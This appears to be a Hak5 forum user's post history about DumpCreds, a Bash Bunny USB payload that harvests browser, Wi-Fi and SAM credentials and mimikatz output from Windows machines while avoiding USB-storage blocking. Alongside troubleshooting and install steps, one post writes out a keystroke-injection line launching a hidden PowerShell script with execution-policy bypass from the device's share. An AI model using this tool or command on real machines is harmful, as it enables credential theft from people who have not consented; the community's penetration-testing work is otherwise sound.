-
Posts
87 -
Joined
-
Last visited
-
Days Won
2
Posts posted by qdba
-
-
With a Hi Sebkinne,
Nice, can't wait for 1.2.
I think the idea with a payload timeout is not so bad. . With a special LED state we know if it make sense to wait for a payload to finish or not.
-
15 hours ago, b0N3z said:
why doesnt it save the loot to the loot directory but instead to the payload folder that it runs from. Is this for a faster payload or to get rid of storage mode during the payload?
Plz. can go to DEBUG mode (create a file named DEBUG in the payload folder. look at the file in the /loot/DumpCred_2.1/log.txt
If there is no log..txt take a look at /tmp/log.txt. If there is something like bunny.service timeout or bunny.service failed you propably run into a timeout.This is a Bunny issue in Firmware 1.1 and will bes solved in Fw 1.2
Look there .....
-
hi
copy all the *.json files to the language folder of the bunny flash storage. After them boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment i have no bunny to look at)
-
you are right. It's to get rid of team storage mode. I don't know any company who allows Usb storage. the sun ports are almost blocked.
so I store the loot to the payload folder and copy it during cleanup to the /loot folder
-
For Responder you don't need any deb Files. Copy the Responder Folder from Tools_Installer payload to <flash_root>\tools end reboot bunny in arming mode.
During reboot the bunny move the file to /tools ( <root_of_bunny_linx>/tools (previously known as /pentest) .You need only a deb file if you have some post- or preinstall scripts running after or befor copy the files.
- 1
-
DumpCreds_2.1 New Version
Changelog
- Complete new payload.txt code for BashBunny 1.1
-
Added a lot of debug code into the payload
For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1 - Impacket.deb included for easy impacket installation
- Some Ducky languages included (from DuckyInstall Payload)
-
DumpCreds 2.1
- Author: QDBA
- Version: Version 2.1.0 Build 1004
- Target: Windows 10
Description
** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **
Dumps the usernames & plaintext passwords from
- Browsers (Crome, IE, FireFox)
- Wifi
- SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True)
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
without
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
- Internet connection (becaus Firewall ContentFilter Blocks the download sites)
Problems
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)
Debug
If you want some debug information, create a file with name "DEBUG" in the payload folder you got the debug information in \loot\DumpCred_2.1\log.txt Folder
Configuration
None needed.
Requirements
impacket - install it form https://github.com/qdba/MyBashBunny/tree/master/tools
Download
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
Install
-
Put Bash Bunny in arming mode
-
Copy All Folders into the root of Bunny Flash Drive Mandatory * payloads/library/DumpCreds_2.1 --> the payload Files * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload * tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed) Not neccessary * docs --> this doc file * languages --> languauge files for DUCKY_LANG
-
eject Bash Bunny safely!!
-
Insert Bash Bunny in arming mode ( Impacket and languages will be installed )
-
Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
-
eject Bash Bunny safely
-
move switch in right position
-
plugin Bash Bunny and have fun....! :-)
STATUS
LED Status Magenta Solid Setup Red slow blink Impacket not found Red fast blink Target did not acquire IP address Yellow single blink Initialization Yellow double blink HID Stage Yellow triple blink Wait for IP coming up Yellow quad blink Wait for Handshake (SMBServer Coming up) Yellow very fast blink Powershell scripts running White fast blink Cleanup, copy Files to /loot Green Finished ----------------------- -------------------------------------------- Discussion
https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage
Credits
to......
https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
Changelog
- Complete new payload.txt code for BashBunny 1.1
-
Added a lot of debug code into the payload
For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1 - Impacket.deb included for easy impacket installation
- Some Ducky languages included (from DuckyInstall Payload)
-
Can be a runtime problem. With default setting a payload does not run longer than 1min 30s since.(measured since plug in the bunny)
After 1min 30 every payload stops working.
Check your /var/log/syslog if there is an entry like :
bunny.service start operation timed out. Terminating
Failed to start bunny.service
-
I'm still running in the payload timeout after 1 Minute.
So I did some investigation about it.
I made the attached payload.txt for testing.
I put the command logger "#### Start Test payload #### at the beginning of the payload and
logger "#### End Test payload ####" at the end. So I can examine the syslog what happens during ten payload run.After approx. 1:30 min bunny.service is running into a timeout
.........
Apr 6 09:56:52 bunny logger: #### Loop Test payload ####
Apr 6 09:56:54 bunny logger: #### Loop Test payload ####
Apr 6 09:56:56 bunny logger: #### Loop Test payload ####
Apr 6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
Apr 6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
Apr 6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
Apr 6 09:56:58 bunny systemd[1]: Starting Multi-User System.
Apr 6 09:56:58 bunny systemd[1]: Reached target Multi-User System.
Apr 6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.The result of the command systemctl show bunny.service |grep Timeout is
TimeoutStartUSec=1min 30s
TimeoutStopUSec=1min 30s
JobTimeoutUSec=0
Guess this is the reason for the payload timeout.
Can anybody confirm this?I willl do more investigations
______________________________________________________________________________________________________________________
OK got it.....
I insert the value
TimeoutSec=5min
under the [Service] section of file /lib/systemd/system/bunny.service
Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout)Be carefully, I'm not responsible for any damage of the bunny :-)
@Darren Kitchen @Sebkinne If you agree (because its part of Firmware) I can make a payload who will patch this.
-
There is a Error ( or is it a Feature ).
There is a timeout approx. 1 min after this timeout the payload stops.
Run attached payload and look at /log.txt
The payload stops after a minute
------------------------------------[Solved] ------------------------------------------------
Look there --- Gucksch du hier :-)
-
Impacket Tools impacket_0.9.15_1.deb
https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/tools
Put the deb file into <root>\tools folder - remove Bunny safely - reinsert in arming mode.
It will be installed to /tools/impacket.
- 1
-
Searching for Language FIles here they are. Exportet from DuckInstall
https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/languages
Put it into <root>\Language folder - remove Bunny safely - reinsert in arming mode
- 1
-
Very nice!! Now let us rewrite some payloads ;-)
-
7 minutes ago, Altao said:
Hi i use DumpCreds 2.0.2 Build 1003
I tried your delay still the same problem.
i see -.+.!
wifi-creds.....
and the rest
and at last very short a red sript part but too short.
Greetings
OK helps a lot. So the handshake Ting works fine.
Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen.
-
16 minutes ago, Altao said:
Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem
i can connect to \\172.16.64.1\e
if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works
if i do ps -ef |grep smb
root 693 1 3 16:00 ? 00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root 1393 967 0 16:06 pts/0 00:00:00 grep smband i have a german keyboard
what my mistake
Greetings
Are you using Version 2.0.2
Is there an UAC Prompt or a Credential prompt?Guess there is a timing Problem. So the main.ps1 script will not start.
LED R G
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500 <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
Q DELAY 1000
Q ENTER
Does the main.ps1 script fire up right. Can you see the command in Console?
Take care that no other Windows is open on the screen. Works best on pure Desktop.
-
1 hour ago, Hectortxz said:
I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink.
Can you connect to \\172.16.64.1\e from explorer?
Is the smbserver.py running ( ssh to Bunny and do a ps -ef |grep smb ) If not see my post above. there is an error in the Impacket installed by tools_installer
-
After a Firmware reset this afternoon, I run in trouble with smbserver.py. He didn't start. The Purple LED blinks slow.
Affter some tests I realized that afer run of the tools_installer the things was fine installed, but smbserver.py had ^M at the end of every line.
I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//gor wth the commands
------------------------------------------------
cd /pentest/impacket/examples
cp smbserver.py smbserver.py.sik
cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py
-----------------------------------------------------------
Now it works again.
-
3 hours ago, Hectortxz said:
Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes
If you set the IP manually, The var TARGET_IP will not be set by bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working at a extended version for bunny_helpers.sh. Its not an Error of payload.
If the LED blinks slow Purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working.
If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell.
Be sure you have the latest Files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.
-
9 hours ago, illwill said:
are your chrome results truncated ?
In Version 2.0.2 it works. In older versions they are truncated.
-
36 minutes ago, illwill said:
i havent tested yours but with chromecreds i had an issue with it truncating the urls with... if they were too long. this is how i solved it
Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250
Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)
-
New Version 2.0.2
Changelog:
- Paralellize Powersploit script, so the payload ist faster.
- Universal Payload. The payload works no matter if there is a UAC prompt or a credentials prompt.. There is no kind of exploitation. You will not get admin rights if you haven't it before. But without admin rights WifiDump, BrowserDump, Computerinformation works fine. Only for Hashdump and M1m1k@tz you ned admin rights.
Install:
Copy all files to your switch directory. Don't forget the PS Folder.
Downlod:
See first Post
-
3 hours ago, Decoy said:
I think you might need to update the main GitHub link on your original post.
Thanks..... Done.....
-
New Version 2.0.1
Added:
Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...)
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
-
15 hours ago, jafahulo said:
python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &
Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case.
There are some timing problems in an older payload. I fixed in a later version. Guess you have an old one . sorry about it.
But anyway fine that you like the payload.
- 1
Filesystem issues
in Bash Bunny
Posted · Edited by qdba
Hello,
At the moment I'm writing an extension which give some debug information during a payload run.
The function START_DEBUG "tail " the /var/log/syslog to /tmp/log.txt (I won't create a extra file because syslog give al lot of more useful information in background.)
During payload run I can output some information to syslog with logger
With STOP_DEBUG I stop the "tail", test if the /dev/nandf is mounted. If so I Copy /tmp/log.txt to /root/disk/loot. /If not I mount the /dev/nandf to /root/udisk, copy the file, do a sync and unmount the /dev/nandf.
Now the Problem. It happens often that when I look in the loot file there is no log file and the FS is corrupted. This happens even I do a sync; sleep 1; sync after copy the file and befor unmounting the FS
It seems tha the FS is not unmunted correctly. Sometimes the dirty bit is set.
Have somebody any idea?
payload.txt
debug.sh